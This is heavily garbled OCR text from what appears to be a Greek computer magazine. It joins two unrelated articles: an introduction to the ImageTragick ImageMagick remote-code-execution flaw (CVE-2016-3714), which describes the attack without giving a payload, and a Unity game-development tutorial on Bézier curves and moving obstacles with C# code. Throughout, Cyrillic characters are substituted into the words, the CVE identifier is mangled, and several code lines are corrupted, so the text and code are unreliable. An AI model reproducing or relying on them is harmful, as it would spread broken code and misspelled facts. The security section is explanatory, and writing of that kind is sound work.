χει Linux, BSD ἡ OS X, τότε δεν μιλάμε για πιθανότητα αλλά για βεβαιότητα. Εσείς 
προφανώς δεν θα παρατηρήσετε τίποτε απ όλα αυτά, αφού η όλη διαδικασία Лар- 
βάνει χώρα στο απομακρυσμένο μηχάνημα. Αν βέβαια το αρχείο που επιχειρήσατε 
у ανεβάσετε δεν συμμορφώνεται µε τους όρους χρήσης της εκάστοτε υπηρεσίας, 
τότε θα λάβετε κάποιο μήνυμα σφάλματος που ίσως σας προτρέπει να δοκιμάσε- 
τε ξανά µε μικρότερο μέγεθος αρχείου ἡ άλλο τύπο εικόνας ἡ κάτι σχετικό µε τις 
ρυθμίσεις και τα permissions του server. Από τη στιγµή που υπάρχει δυνατότητα για 
αποστολή τέτοιων μηνυμάτων, αυτό σηµαίνει оті то απομακρυσμένο μηχάνημα εἰναι 
σε θέση να καταλαβαίνει αν το υπό επεξεργασία αρχείο είναι εικόνα ἡ ὀχι. Αν εἰναι, 
χρησιμοποιώντας τότε κάποιο πρόγραμμα ανάλυσης, όπως, T.X., το εργαλείο identify 
του ImageMagick, εφαρμόζει τους επιθυμητούς ελέγχους. 


<story тоде= 'оп'> 


Όλα ξεκίνησαν όταν µία ομάδα πονηρών ξωτικών αποφάσισαν να ξεγελάσουν то 
Μάγο µε το μπλε καπέλο. 


Του ἔδωσαν λοιπόν µια φωτογραφία η οποία µέσα της περιείχε μαγικά σκαθάρια, 
µε απώτερο σκοπό να καταστρέψουν την καλή του φήμη! Τα σκαθάρια αυτά ήταν 
αόρατα και φανερώνονταν μόνον όταν τους ασκούταν μαγεία. 


Έτσι κι έγινε, λοιπόν. О φίλος ImageMagick έλαβε το πακέτο των ξωτικών κι 
όταν έκανε τα μαγικά του, τα σκαθάρια φανερώθηκαν μπροστά του. Πριν προλά- 
βει να κάτι κάτι αυτά τρέξανε και κρύφτηκαν µέσα στο ραβδί του, αποκτώντας 
έτσι πρόσβαση σ' αυτό! 
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VHA@KER 


Από εκείνη την ηµέρα, κάθε φορά που ο μάγος έκανε τα μαγικά του, OL φωτο- 
γραφίες καταστρέφονταν και οι πελάτες του δεν ήταν καθόλου ευχαριστημένοι. 


Μετά апо µια σειρά δυσάρεστα περιστατικά, δεν άργησε να διαδοθεί éva πα- 
ρατσούκλι για τον μάγο µας. Κάποιοι κατάφεραν και του κόλλησαν т' буора 
"ImageTragick", ἔτσι WOTE να µη χρησιμοποιήσει κανείς τις υπηρεσίες του, ποτέ 
ξανά! 


<5їогу mode='off'> 


Τι σηµαίνει όµως "εικόνα" για τον υπολογιστή και πώς τη "βλέπει"; Θα κάνουµε μία 
στάση εδώ, καθώς εἰναι αρκετά ενδιαφέρον θέμα, το οποίο αν το γνώριζε καλά о 
μάγος της ιστορίας µας δεν θα έπεφτε ποτέ στην παγίδα των σατανικώὠν ξωτικών. 


Picture Element > Pict-el > Pixel 


Αν κι ο γράφων ἐχει ασχοληθεί εκτενέστερα µε θέµατα computer vision και face 
detection, φοβούμαστε оті ίσως ξεφύγει (περισσότερο) αν ξεκινήσει ν' αναλύει τι 
εἶναι η ψηφιακή φωτογραφία. Ωστόσο, εἰναι σηµαντικό να καταλάβουμε от για τον 
υπολογιστή µια ψηφιακή φωτογραφία δεν εἶναι παρά éva ακόµα αρχείο σαν όλα τ' 
άλλα, γεμάτο κώδικα. Και τι κὠδικα; Εντελώς ασυνάρτητο! 


File Edit Debug Window Help News 


1057 Ёз Œ [Ê Curent Directory: /home/panos/test А: 


File Browser ® х Command Window 8 
Θ Columns 1 through 24: 


κ 

[home/panos/test τ 

158 160 161 159 156 155 157 160 160 158 154 152 155 160 157 150 151 155 158 156 151 148 150 153 
159 156 155 157 160 160 159 155 152 156 160 157 151 152 155 158 156 152 149 150 153 
159 157 156 158 160 161 160 156 153 155 159 157 151 153 156 158 156 153 150 151 153 


u68Vakj.jpg 
158 157 157 158 159 160 160 157 154 155 158 156 151 153 155 157 156 153 151 151 152 


157 157 157 157 157 159 160 158 154 153 156 155 151 153 154 155 154 153 151 150 151 
155 156 157 156 155 158 159 158 153 151 153 153 150 153 153 153 153 152 159 149 148 
153 155 156 155 153 156 158 157 152 149 151 151 148 152 151 151 151 151 150 148 146 
152 154 155 154 152 155 158 157 151 148 149 150 147 151 150 149 149 150 149 147 145 
156 157 157 155 154 158 155 154 156 155 151 150 153 153 153 153 152 152 151 151 151 
155 154 153 151 149 158 154 154 156 155 151 150 153 153 153 153 152 152 151 151 151 
153 151 149 146 145 157 154 153 155 155 151 151 153 153 153 153 152 152 151 151 151 
152 151 148 146 145 156 153 152 155 154 151 151 153 153 153 153 152 152 151 151 151 
152 152 151 150 150 155 152 152 154 154 151 151 154 153 153 153 152 152 151 151 151 
153 153 153 153 153 154 151 151 154 154 151 151 154 153 153 153 152 152 151 151 151 
152 152 153 153 153 153 150 151 154 154 151 151 154 153 153 153 152 152 151 151 151 
152 151 151 151 152 153 150 150 153 154 151 151 154 153 153 153 152 152 151 151 151 
152 152 151 151 151 151 151 151 152 152 153 153 153 150 150 151 152 152 153 154 154 
153 152 152 151 150 151 151 152 152 152 153 153 153 151 151 152 152 152 153 153 153 
154 153 152 150 149 151 152 152 152 153 153 153 153 153 153 153 153 152 152 152 152 
154 154 152 150 149 152 152 152 153 153 153 154 154 155 155 154 153 152 151 151 150 
154 153 152 151 150 152 152 153 153 153 154 154 154 156 156 155 154 153 152 151 150 
152 152 151 151 151 153 153 153 153 154 154 154 155 156 156 155 154 153 152 151 151 
150 150 151 152 153 153 153 153 154 154 154 155 155 155 155 155 154 154 153 153 152 
149 148 150 152 154 153 153 153 154 154 155 155 155 155 155 155 154 154 154 153 153 
149 150 153 157 159 153 154 154 155 155 154 154 153 155 154 154 153 153 154 155 155 
147 148 150 153 154 153 154 154 155 155 154 154 153 155 155 154 153 153 153 154 154 
149 150 150 151 152 154 154 155 155 155 155 154 154 156 155 154 153 152 152 152 153 
154 155 154 154 153 154 154 155 156 156 155 154 154 156 155 154 153 152 152 152 152 
157 157 156 155 154 154 155 156 156 156 156 155 154 156 156 155 154 153 153 154 154 
156 156 155 154 153 155 155 156 156 156 156 155 155 156 156 155 155 155 155 156 157 
155 154 154 153 153 155 156 156 157 157 156 156 155 156 156 156 156 157 158 159 160 
155 155 155 155 155 155 156 156 157 157 156 156 155 156 156 156 157 158 169 161 162 
153 154 153 152 151 154 155 156 156 156 155 153 153 159 158 157 156 156 158 159 160 
154 154 153 152 151 159 157 154 152 153 156 159 162 159 158 157 157 157 158 168 161 
155 154 153 153 153 156 155 154 154 155 158 160 162 159 159 158 158 159 160 161 161 
154 153 153 154 155 149 152 157 160 161 159 156 154 159 159 159 160 160 161 162 162 
153 153 154 156 157 153 156 160 163 163 160 156 153 159 159 169 161 162 163 164 164 
154 154 155 156 157 164 162 160 158 158 159 160 162 159 160 162 163 164 165 165 165 
157 157 156 156 155 162 166 157 155 155 158 161 163 159 160 162 164 166 166 166 166 
а Р 160 159 157 155 154 151 152 154 156 157 157 157 156 159 160 163 165 166 167 166 166 
164 162 160 160 161 160 158 156 156 157 159 159 158 159 161 164 162 163 164 164 165 165 164 164 
160 159 157 157 158 158 156 154 154 155 156 156 156 157 160 162 164 165 166 166 166 165 163 162 


disp () 


ЕЕ » 


Command Window Editor Documentation 


Να πώς μοιάζει µια εικόνα για το Octave, όταν την avoiyovpe µε τη 
βοήθεια της συνάρτησης ітгеаа(). 
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Έχετε ανοίξει поте ένα αρχείο εικόνας τύπου JPEG, µε κάποιο πρόγραµµα επεξερ- 
γασίας κειµένου ἡ έναν text editor; Αν η απάντησή σας είναι καταφατική, τότε ξέρετε 
ακριβώς γιατι πράγμα μιλάμε. Το ακατανόητο, σε άτοµα χωρίς μαγικές ικανότητες, 
περιεχόµενο, οφείλεται στο γεγονός ότι το JPEG εἰναι στην πραγματικότητα ένα 
συμπιεσμένο αρχείο. Н κατάληξη (extension) στο τέλος του αρχείου (jpeg ἡ jpg) vno- 
δηλώνει συνήθως τον αλγόριθμο που χρησιμοποιήθηκε για να γίνει αυτή η συμπίε- 
ση. Βέβαια η κατάληξη апо μόνη της δεν φανερώνει πάντοτε τον τύπο του αρχείου, 
αφού αυτή μπορούμε να την αλλάζουμε και φυσικά µε κάθε αλλαγή δεν θα αλλάζει 
και το περιεχόµενο του αντίστοιχου αρχείου. Αυτό που χρειαζόμαστε, λοιπόν, εἶναι 
éva проүрарра пор αφενός µπορεί και διαβάζει το περιεχόµενο ενός οποιουδήποτε 
αρχείου, αφετέρου καταλαβαίνει περί τίνος πρὀκειται. Μετά την αναγνώριση του 
τύπου ενός αρχείου είναι εὐκολονα προχωράμε στους επιθυμητούς ή κατάλληλους 
χειρισμούς, όπως, T.X., εἰναι η εμφάνιση της εικόνας ἡ το άνοιγµα του αντίστοιχου 
αρχείου µε µια εφαρµογή που ξέρει πώς να αποδίδει το περιεχόμενό του. 


Χωρίς τη συμπίεση και στην περίπτωση μίας δυαδικής εικόνας (џаоро=0, άσπρο = 
1), τα πράγματα θα ήταν πολύ πιο απλά και κατανοητά. Па παράδειγµα, αν πάρετε 
έναν μαύρο µαρκαδόρο, ζωγραφίσετε τον αριθµό éva (1), τον βγάλετε µία φωτογρα- 
φία,τη σαρώσετε στον υπολογιστή και, τέλος, την αποθηκεύσετε σε δυαδική μορφή 
µε ανάλυση 5х7 εικονοστοιχεία, ουσιαστικά θα έχετε κάτι τέτοιο: 


Βέβαια, σήμερα που έχουµε ήδη μπει στη µετά High-Definition εποχή και κινούμαστε 
στον κόσµο του 4K, η απουσία συμπίεσης θα εἰχε σημαντικότατο αντίκτυπο στον 
αποθηκευτικό χώρο που διαθέτουμε. Н ανάγκη για συμπίεση, λοιπόν, είναι επιτακτι- 
кї. Αυτός εἰναι κι ο βασικός λόγος που όλοι, ра όλοι οι webservers που επιτρέπουν 
το uploading φωτογραφιών και εικόνων, χρησιμοποιούν από πίσω κάποιο πρόγραμ- 
μα σαν το ImageMagick, για τη μετατροπή των σχετικών αρχείων σε μορφές που 
στοιχίζουν σαφώς λιγότερο σε bytes. 


Κώδικας µέσα σε εικόνες 


Μαζί µε όλα τ' άλλα, το ImageMagick υποστηρίζει και την επεξεργασία διανυσµατι- 
κών εικόνων (Scalable Vector Graphics, αρχεία SVG). Με απλά λόγια, πρὀκειται για 
εικόνες οι οποίες σχηματίζονται από τη σύνθεση βασικών γεωμετρικών σχημάτων, 
όπως, T.X., είναι οι γραμμές, τα ορθογώνια, οι ελλείψεις και τα τόξα. Χάρη στο OXE- 
τικό format, τα αρχεία SVG υπερτερούν έναντι άλλων ψηφιακών εικόνων: Αφενός 
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καταλαμβάνουν εξωφρενικά λίγο χώρο ото δίσκο, αφετέρου το περιεχόμενό τους 
αναπαράγεται σε τέλεια ποιότητα ανεξαρτήτως της µεγέθυνσης (δηλαδή του zoom 
level). 


Επόμενο εἰναι, λοιπόν, τέτοιες εικόνες να εἰναι ιδανικές για то Internet, αφού фор- 
τώνουν πολύ γρήγορα (λόγω του μικρού τους μεγέθους) και την ἰδια στιγµή προ- 
σφέρουν τέλεια ποιότητα “ανεξαρτήτως” της ανάλυσης της οθόνης του χρήστη. 
Ως παράδειγµα, δείτε πόσο εύκολο είναι να ενσωματώσουµε σε µια σελίδα HTML 
κώδικα SVG, προκειµένου να ζωγραφίσουμε έναν κύκλο: 


<html> 
<svg width="100" height="100"> 
<circle cx="50" cy="50" r="40" stroke="black" stroke-width="4" fill="red" /> 
</svg> 
</html> 


Νομίζουμε ὁτι ο κώδικας της εικόνας εἶναι κατανοητός - και μάλιστα ὀχι µόνο апо 
οντότητες µε μαγικές ικανότητες. 


Μέχρι τώρα έχουµε δει τι εἰναι το ImageMagick, για ποιο λόγο χρησιµοποιείται TA- 
ρασκηνιακά апо τους webservers, ενώ έχουμε εξηγήσει και τη σημασία της συμπί- 
εσης/µετατροπής των εικόνων που ανεβαίνουν στους servers. Επίσης, εἰδαμε пос 
μπορούμε να γράψουμε κώδικα µέσα σε μία εικόνα (τύπου SVG) αλλά και πόσο εὐ- 
коло είναι αυτό. Ἠρθε λοιπόν η στιγµή να μιλήσουμε για το σατανικό σενάριο των 
ξωτικών της ιστορίας: την εκτέλεση κακόβουλου κώδικα µέσα σε εικόνες. 


ImageTragick: ΟΝΕ-2016-3714 


Ένας γλόμπος φωτίστηκε πάνω апо τα κεφάλια των ρώσων χάκερς stewie 
(111р=://паскегопе.соту/ѕїеууіе) και Nikolay Ermishkin, των πονηρών ξωτικών της 
ιστορίας µας, όταν εντόπισαν το συγκεκριµένο κενό ασφαλείας (ΟνΝΕ-2016-3714) 
στον κώδικα του ImageMagick. 


Στις αρχές του Μαΐου δημοσιεύτηκαν αρκετές ευπάθειες (vulnerabilities) που αφο- 
ρούσαν ото ImageMagick, οι οποίες για τους λόγους που εἰδαμε πιο πάνω (κώδι- 
κας µέσα σε εικόνες) ήταν αρκετά σημαντικές үа VA προκαλέσουν πανικό σε όλους 
τους υπευθύνους servers, στους οποίους επιτρέπεται το uploading εικόνων. Τέτοια 
μηχανήματα εἰναι πολύ πιθανό να φιλοξενούν πλατφόρμες όπως εἰναι éva forum 
(π.χ., IPB, phpBB3 κ.ά.) ή éva CMS (σαν то WordPresss) - μέχρι και cloud services 
όπως та CloudFlare και Amazon Cloud. Πανικός! Βλέπετε, σ αυτές τις υπηρεσίες, 
όταν ο χρήστης ανεβάζει µια εικόνα, συνήθως λαμβάνει αυτομάτως χώρα ша διαδι- 
κασία μετατροπής της εικόνας σε μικρότερο μέγεθος, για καλύτερη διαχείριση του 
αποθηκευτικού χώρου. 


Το πρόβλημα λοιπόν προκύπτει όταν κάποιος апо τους απομακρυσμένους servers 
χρησιμοποιεί то ImageMagick, π.χ., για την παραγωγή thumbnails. Σε µια τέτοια - 
καθόλου σπάνια- περίπτωση, αν ο κακόβουλος χρήστης ανεβάσει µια κατάλληλα 
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διαμορφωμένη εικόνα (τα σκαθάρια της ιστορίας), το ImageMagick (το ραβδί της 
ιστορίας), ξεγελιέται κι επιτρέπει στον uploader να τρέξει απομακρυσμένα κώδικα 
(Remote Code Execution, КСЕ) στο µηχάνηµα όπου λαμβάνει χώρα η μετατροπή (το 
τραγικό συμβάν της ιστορίας). Στη συνέχεια, χρησιμοποιώντας αυτό το κενό ασφά- 
λειας, ο επιτιθέµενος µπορεί κάλλιστα να κατεβάσει τα δικά του εργαλεία στον 
ευπαθή server, τα οποία Өа του επιτρέψουν στη συνέχεια να αποκτήσει τον πλήρη 
έλεγχο του box. Αυτό συνήθως επιτυγχάνεται τρέχοντας ένα shell, µέσω του οποίου 
παρέχεται η δυνατότητα για ελεύθερη εκτέλεση εντολών στο σύστημα-στόχο. 


Γενικά, προκειµένου να καταφέρεις και να τρέξεις ένα τέτοιο exploit αποκρυσμένα, 
απαιτείται πολύ καλή γνώση και κατανόηση του όποιου προβλήματος, της διαχείρι- 
σης της μνήμης και της Assembly. Μιλάμε δηλαδή για γνώσεις που λίγοι εκλεκτοί 
κατέχουν (Στ.Ε. και µην ψαρώνετε апо τους hackers-wannabe ή/και апо τους AUTO- 
χαρακτηριζόµενους ως experts). 
Δυστυχώς, το συγκεκριµένο bug στο ImageMagick αφαιρεί την προὐπόθεση της Ka- 
Айс γνώσης, που συνήθως απαιτείται για επιτυχημένη επίθεση σε απομακρυσμένο 
server. Θα το πούμε και διαφορετικά: Το εν λόγω vulnerability επιτρέπει στον επιτι- 
θέμενονα πάρει στην κατοχή του τον πλήρη έλεγχο του άλλου υπολογιστή (π.χ.,του 
webserver) µε πολύ μεγάλη ευκολία, και να τρέξει εκεί τον κώδικα που επιθυμεί. 
Ακόμη κι ένα script-kiddie εἶναι δυνατό να πετύχει εντυπωσιακά αποτελέσµατα. 
Φρίκη. 
Στα άρθρα που αρχίζουν апо τις σελίδες 30 και 54 TOU παρόντος τεύχους, θα αναλύ- 
OOUE то συγκεκριµένο bug апо τη ратіа του περίεργου -µε την καλή έννοια- χρή- 
στη Linux. Με τις λίγες αλλά βασικές γνώσεις που έχουμε, θα... 
ψάξουμε να βρούμε την αιτία του προβλήματος 
δοκιµάσουµε να τρέξουµε το exploit και να καταλάβουμε πως λειτουργεί 
δοκιµάσουµε παραπλήσια exploits, που επίσης σχετίζονται µε то ImageTragick 
διορθώσουμε το πρόβλημα στο σύστημά µας (openSUSE Leap 421) 


μελετήσουμε τη λύση που δίνεται µέσω σχετικού patch 


Στο τέλος της αναζήτησής µας, εἶναι σίγουρο ότι θα έχουµε μάθει πολλά πράγματα 
ὀχι µόνο για το ImageTragick, αλλά και για το LINUX γενικότερα. 


Καλή συνέχεια ευχόμαστε! 
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Skill: Intermediate 
Tags: Bezier curves, Unity, game development 


Καμπύλες Bézier 


Στο προηγούμενο άρθρο της σειράς µας περί game development, µιλήσαμε yta то 
game loop και τη σημασία του στις σημερινές μηχανές δημιουργίας παιχνιδιών, 
ενώ συνεχίσαµε µε τον προγραμματισμό της σφαίρας που κινεί ο παίκτης στο 
παιχνίδι µας. Στο παρόν άρθρο καταπιανόµαστε ре тіс καμπύλες Bézier και 
προσθέτουμε κινούμενα εμπόδια. 


του Γιάννη Κρομμύδα 


Па να ζωγραφίσουµε κάτι σε δύο διαστάσεις, συνήθως χρησιμοποιούμε γραμμές. 
Οι γραμμές κατά βάση κατηγοριοποιούνται σε ευθείες και σε καμπύλες. (Στ.Ε. Ένας 
Μαθηματικός θα σημείωνε ότι η ευθεία εἶναι απλά µια ειδική περίπτωση καμπύ- 
AnG, αλλά ποιος δίνει σημασία στους Μαθηματικούς) Οι ευθείες γραμμές εἰναι £v- 
коло να γίνουν, είτε από εμάς είτε από τους υπολογιστές. Για τη δηµιουργία τους 
απλά χρειαζόμαστε το σηµείο που ξεκινούν και το σηµείο που τελειώνουν. (Στ.Ε. 
Επομένως δεν μιλάμε για ευθείες, αλλά για ευθύγραμμα τμήματα. Εντάξει, εντά- 
ξει, υποσχόµαστε να µην επέµβουµε ξανά.) Οι καμπύλες, όμως, εἶναι αρκετά πιο по- 
λύπλοκες - τουλάχιστον για τους υπολογιστές. Ενώ μπορούμε να ζωγραφίζουμε 
καμπύλες εξαιρετικά εύκολα µε το χέρι, οἱ υπολογιστές θα λέγαμε оті εἰναι λίγο 
προβληµατικοίἰ στον τοµέα αυτό. 


Οι αρτιστικές ικανότητες TWV μηχανών 


Πα να σχεδιαστεί µια γραμμή ато ἕναν υπολογιστή, το μηχάνημα -ń ακριβέστερατο 
πρόγραµµα- πρέπεινα γνωρίζει τη μαθηματική συνάρτηση που ορίζει τα σηµεία απ' 
όπου περνάει η γραμμή αυτή, ώστε va та παρουσιάσει (µε κάποιο χρώμα ίσως) στην 
οθόνη µας. Αυτό συμβαίνει και γιατους δύο τύπους γραμμών. Όταν πρόκειται για £V- 
θείες γραμμές, οι συναρτήσεις εἶναι εύκολες. Μια και οι συναρτήσεις είναι εύκολες, 
αντίστοιχα εύκολος εἰναι και ο υπολογισμός του αποτελέσµατός τους. Χρειαζόμα- 
στε μαθηματικές συναρτήσεις που να μπορούν να σχηματίζουν όμορφες” καμπύλες, 
олла поо παράλληλα είναι και γρήγορες" στον υπολογισμό τους. Υπάρχουν αρκετές 
συναρτήσεις που μπορούν να χρησιμοποιηθούν για τη δηµιουργία καμπυλών, αλλά 
µια ομάδα συναρτήσεων απέκτησε µεγάλη δημοτικότητα και πλέον χρησιμοποιού- 
νται πάνω κάτω σε οτιδήποτε χρειάζεται να ζωγραφίσει καμπύλες γραμμές. Το óvo- 
μα αυτών; Καμπύλες Bézier. 


Πήραν το буора τους από τον Γάλλο Pierre Bézier που τις παρουσίασε στις αρχές 
τις δεκαετίας του '60, ως καμπύλες για δουλειές σχεδιασμού. Н αλήθεια εἰναι ότι 
υπάρχει µια σύγχυση για το ποιος πραγματικά ήταν ο πρώτος που δημιούργησε συ- 
ναρτήσεις για τις καμπύλες αυτές, αφού ο Casteljau τις είχε επινοήσει νωρίτερα 
αλλά δεν δημοσίευσε την ἐρευνά του. Σε κάθε περίπτωση, αυτό που ενδεχομένως 
να µας ενδιαφέρει περισσότερο εἰναι ότι μπορούμε να συνδέσουµε περισσότερες 
апо μία καμπύλες μεταξύ τους κάνοντάς τες να φαίνονται σαν μία. 


28 


Καμπύλες Bézier 


9 (169,27) 
О (51,120) (211.115) (70.117) 
© (182,207) 
(82.244) 
(14.254) 
τετραγωνική καμπύλη Κυβική Καμπύλη 


Οι καμπύλες Bézier παίρνουν ονόματα ανάλογα µε το βαθµό των 
συναρτήσεων που χρησιμοποιούνται γιανα τις απεικονίσουν. 


Οι καμπύλες Bézier εἶναι αποτέλεσµα γραμμικών παρεμβολῶν. Ουσιαστικά μιλάμε 
για τη διαδικασία επιλογής ενός σημείου, το οποίο βρίσκεται ανάμεσα σε δύο άλλα 
σημεία. Όπως όλες οι γραμμές, ἐτσι και οι καμπύλες Bézier έχουν ένα σηµείο αρχής 
και éva σηµείο τέλους. Н δε καμπυλότητάτους επηρεάζεται από ένα ἡ περισσότερα 
ενδιάµεσα σηµεία ελέγχου. 

Δεν θα ασχοληθούμε µε τα (σχετικά πολύπλοκα) µαθηµατικά που κρύβονται πίσω 
апо τις συναρτήσεις των καμπυλών, αλλά θεωρούμε πρέπον να παραθέσουµε τον 
κώδικα που µας επιτρέπει την εύρεση των σημείων τους. О κώδικας υπολογίζει 
καμπύλες τρίτου βαθμού (κυβικές) και τον επιλέξαμε µια και εἶναι ο πιο ευρέως 
χρησιμοποιούμενος στη δημιουργία παιχνιδιών. 


40 = CalculateBezierPoint(0, ро, p1, p2, p3); 
for(int i = 1; i <= SEGMENT_COUNT; i++) 
{ 
t = i / (float) SEGMENT_COUNT; 
q1 = CalculateBezierPoint(t, p0, p1, p2, p3); 
DrawLine(q0, q1); 
90 = 91; 
} 


Vector3 CalculateBezierPoint(float t, Vector3 p0, Vector3 p1, Vector3 p2, 
Vector3 p3) 


{ 
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float и = 1 - t; 

Ποσο Ce = [кеден 

float uu = и*и; 

float uuu = uu * u; 

ᾖροι EWE КЕК τς 

Vector3 p = uuu * p0; //first term 

р += 3 * ш τ pii //ѕесопа tenm 
РИТЕ єз ўе УУД ТМД 
p += ttt * p3; //fourth term 

γεζυγη р; 


} 


Ας κάνουμε μερικά σχόλια επ’ αυτού. Па να ζωγραφίσουµε µια καμπύλη θα χρεια- 
στούµε 4 σημεία. Το σηµείο αρχής της καμπύλης, ро, τα δύο ενδιάμεσα σηµεία p1 και 
p2 (αυτά που ορίζουν την καμπυλότητα), καθώς KALTO σηµείο τέλους της καμπύλης, 
p3. O αλγόριθμος θα ζωγραφίσει πολλές μικρές γραμμές μεταξύ διαδοχικών σημεί- 
ων της καμπύλης αφού πρώτα τα υπολογίσει. Το πλήθος των επαναλήψεων — και 
κατ’ επέκταση το πλήθος των γραμμών - ορίζεται опо τη μεταβλητή ΦΕΘΜΕΝΤ. 
COUNT. Όσο περισσότερο μεγαλώσουμε την τιμή της, τόσο περισσότερες επαναλή- 
ψεις θα έχουμε. Το αποτέλεσµα θα εἰναι µια πιο ομαλή καμπύλη. 


Ίσως παρατηρήσατε τις πέντε πρωτες γραμμές της μεθόδου CalculateBezierPoint. 
Αν σας φάνηκε περίεργο που αποθηκεύουµε αυτές τις τιµές των δυνάμεων, σας 
εξηγούμε ὁτι ο μόνος λόγος που το κάνουμε αυτό εἰναι γιατί ο υπολογισμός τους 
εἶναι δαπανηρή διαδικασία για τον επεξεργαστή. Οπότε, απλοποιούµε τις δυνάμεις 
σε απλούς πολλαπλασιασμούς, και µια και οι ίδιοι αριθμοί χρειάζονται πάνω από µία 
φορά, τους αποθηκεύουµε σε μεταβλητές για επαναχρησιµοποίηση. 


Όπως ενδέχεται ήδη να καταλάβατε, ο κώδικας παραπάνω µπορεί να απεικονίσει 
µια κυβική καμπύλη Bézier σε τρισδιάστατο χώρο. Αυτό το υποδηλώνει ο τύπος 
УесїогЗ που χρησιµοποιήσαμε για τα σηµεία, ο οποίος περιλαμβάνει τιμές για тоу 
προσδιορισμό ενός σημείου σε éva τρισδιάστατο χώρο (х, у, z). Αν θέλουμε να πε- 
ριορίσουµε τις καμπύλες στους δύο µόνο ἄξονες, δηλαδή να ζωγραφίσουµε σε δύο 
διαστάσεις, το µόνο που θα χρειαστεί να κάνουμε εἰναι αντί του τύπου Vector3 να 
χρησιμοποιήσουμε τον τύπο Vector2. О τύπος αυτός περιλαμβάνει τιµές yta tN θέση 
ενός σημείου σε δύο άξονες (х, у). Τα υπόλοιπα Ва та κάνει ο επεξεργαστής για εμάς. 


Περί εμποδίων 


Αφού λοιπόν αγγίξαµε την επιφάνεια της λειτουργίας των καμπυλών Bézier, ας επι- 
στρέψουµε στο παιχνίδι µας. Την προηγούμενη φορά είχαμε ολοκληρώσει την κίνη- 
ση της σφαίρας που χειρίζεται ο παίχτης, κάνοντάς τη να κινείται кає прос ταµπρος 
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й και προς τα πίσω. Αυτή τη фора θα προσθέσουμε εμπόδια στην πίστα µας. Θα Ká- 
VOULE το μήκος τους να εἰναι τυχαίο (εντός ενός εύρους, προφανώς) και επίσης θα 
τα κάνουμε να κινούνται προς µια κατεύθυνση µε ρυθμιζόμενη από εμάς ταχύτητα. 


Μια και τα εμπόδια θα εμφανίζονται µόνα τους (µέσω script) στην πίστα, θα χρεια- 
στεί να είναι αποθηκευμένα ως ἕνα prefab. Па ευκολία το prefab θα βρίσκεται στον 
φάκελο Resources, πράγμα που θα µας επιτρέψει να φορτώσουμε και να χρησιμο- 
ποιήσουµε αντικείμενα που δεν υπάρχουν ήδη στην σκηνή µας. 


Ξεκινάμε δημιουργώντας το εμπόδιο και δίνοντάς του ένα μαύρο χρώμα. 


e Έχουμε τη σκηνή бате. ипіќу ανοιχτή και πάμε СатеОбјесї -> 3D Object -» 
Cube. 


Ονομάζουμε το νέο αντικείµενο "Obstacle", µια και θα αντιπροσωπεύει τα 
εμπόδια της πίστας. 


Τοποθετούμε τον κύβο στη θέση (0, 1, 0). Στον Inspector, θέτουµε τις αντίστοι- 
χες τιμές στα πεδία της τιμής του Position, στο Transform Component του κύ- 
βου. 


Κάνουμε δεξί κλικ στο φάκελο Materials, στο παράθυρο Project, επιλέγουμε 
Create -> Material για να δημιουργήσουμε éva νέο material, του δίνουμε και το 
όνομα "Obstacle". 


Στον Ιπ5ρ6οῖοι, θέτουμε το χρώμα του Albedo σε μαύρο (#000000ЕЕ). 


Αναθέτουµετο material που μόλις δημιουργήσαμε στον κύβο, κάνοντάς το drag 
and drop από το παράθυρο Project στον κύβο που φαίνεται στην σκηνή й στο 
αντικείµενο "Obstacle", που φαίνεται στο παράθυρο Hierarchy. 


. Έτοιμοι να γράψουμε то script των εμποδίων. Πηγαίνουμε στο φάκελο Scripts, 
στο παράθυρο Project, µε δεξί κλικ δημιουργούμε éva νέο αρχείο Οὔ Script µε 
όνομα Obstacle.cs, προσθέτουμε τον παρακάτω κώδικα. 


using UnityEngine; 
namespace Deltahacker 
public class Obstacle : MonoBehaviour 


public float WidthModifier = 1; 
public float Speed; 


public void Start() 
{ 


їгап<$Тогт.1оса15са1е = пем Vector3(WidthModifier, 1, 1); 


} 
public void Update() 
{ 


transform.position += new Vector3(Speed * Time.deltaTime, 0, 0); 
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public static батеОбјесі Instantiate(InitializationData data, float 
scale, float speed) 
{ 


Сате0бјесї instance = (Game0bject)Instantiate(data.Prefab, data. 
Position, data.Rotation); 


Obstacle script = instance .GetComponent<Obstacle>(); 
script.Speed = speed; 
script.WidthModifier = scale; 


return instance; 


} 
} 
public struct InitializationData 
{ 


public Game0bject Prefab; 
public Vector3 Position; 
public Quaternion Rotation; 


Τα εμπόδια στο παιχνίδι µας εἰναι απλά κουτιά, χωρίς ιδιαίτερους μηχανισμούς. 
Στον παραπάνω κώδικα βλέπουμε ότι χρειαζόμαστε µια μεταβλητή που θαπεριέχει 
την τιμή της ταχύτητας του εμποδίου, καθως και άλλη μίαπου θαπεριέχει την τιμή 
του μήκους του εμποδίου. Н ταχύτητα χρησιµοποιείται στην μέθοδο Update για να 
μεταθέσει τον κύβο αριστερά ἡ δεξιά (εξαρτάται από το πρόσημο της ταχύτητας) 
ανάλογα µε την ταχύτητα εκτέλεσης του κώδικα του παιχνιδιού (εξ' ου και η χρήση 
της Тіте.деіќаТіте). Н τιµή του μήκους χρησιµοποιείται ουσιαστικά για την αρχι- 
κοποίηση του αντικειμένου στη μέθοδο Start. Δεν μπορούμε να τη θέσουμε στην 
Awake, µιας Kar n μέθοδος αυτή θακληθεί αµέσως µετά την Instantiate οπότε δεν θα 
ἐχει τεθεί η τιµή της ακόµα κι ἐτσι το μήκος του εμποδίου θα γίνει μηδενικό. 


Н static μέθοδος Instantiate εἶναι απλά ένας wrapper της αντίστοιχης μεθόδου του 
ΑΡΙ της μηχανής. Θα μπορούσε να παραλειφθεί εντελώς σε αυτή την κλάση και να 
χρησιμοποιηθεί κατευθείαν στο σηµείο που θα γίνει η κλήση της, αλλά βρίσκουμε 
τον κώδικα πιο τακτοποιημένο µε αυτόν τον τρόπο. Н μέθοδος παίρνει σαν napa- 
μέτρους ένα struct τύπου lnitializationData, καθως και δύο μεταβλητές τύπου float: 
μία για την ταχύτητα του εμποδίου και άλλη μία για το μέγεθός του. Μέσα σε αυτή 
χρησιμοποιούμε τη μέθοδο Instantiate της Unity, προκειμένου να δημιουργήσουμε 
το αντίγραφο. Με τη беїСотропепї θέτουµε την ταχύτητά του και το μέγεθος, ото 
5$спїрї που έχουµε προσκολλήσει στο αντικείµενο. 


Ας πούμε δυο λόγια για τη μέθοδο Object.Instatiate (του АРІ της Unity). Н μέθοδος 
χρησιμοποιείται για να δημιουργήσουμε ένα αντίγραφο ενός αντικειμένου. Μαζί µε 
